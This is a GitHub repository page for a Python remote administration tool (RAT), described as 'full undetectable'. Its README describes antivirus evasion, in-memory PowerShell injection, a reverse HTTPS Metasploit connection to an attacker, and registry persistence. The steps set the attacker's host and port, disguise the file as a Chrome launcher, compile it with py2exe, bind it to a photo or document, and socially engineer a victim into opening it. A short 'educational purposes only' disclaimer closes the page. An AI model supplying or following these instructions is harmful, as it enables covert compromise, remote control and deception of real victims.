Skip to content

Python Remote Administration Tool (RAT) to gain meterpreter session

Notifications You must be signed in to change notification settings

under-web/Python-Rootkit

 
 

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

38 Commits
 
 
 
 
 
 
 
 
 
 

Repository files navigation

python-rootkit

This is a full undetectable python RAT which can bypass almost all antivirus and open a backdoor inside any windows machine which will establish a reverse https Metasploit connection to your listening machine.

ViRu5 life cycle

  • Bypass all anti-virus.
  • Inject a malicius powershell script into memory.
  • Establish a reverse https connection to attacker machine.
  • Check every 10 seconds and make sure that the connection is still exist, If not it will re-establish a new connection.
  • Add a startup register key to re-connect to attacker after reboot.

Steps

  • Update viRu5/source.py parameters with your lhost and lport
  • Change source.py name to GoogleChromeAutoLaunch.py
  • Add GoogleChromeAutoLaunch.py, setup.py and your icon as icon.ico to c:\python27 dir
  • From cmd do
    cd c:\python27 && python setup.py py2exe
  • Find the RAT file in Dist directiory.
  • Blind it with any photo, pdf, word or any kind of files
  • Send it to the victim
  • Use your social engineer skills to make him open the files
  • You will recieve a reverse https metasoplit connection :)

Testing on

  • Windows 7 x64/x86
  • Widowns 8
  • Windows 8.1 x64/x86
  • Windows 10 x64/x86

Thanks

Thanks for every security researcher how spend a time to help people and make the community more powerful. Thanks for powerShellEmpire guys.

Disclaimer

This is for Educational purposes ONLY. First of all, this code aims to alarm people about security issues infected unpatched machines.

About

Python Remote Administration Tool (RAT) to gain meterpreter session

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published

Languages

  • Python 70.9%
  • PowerShell 29.1%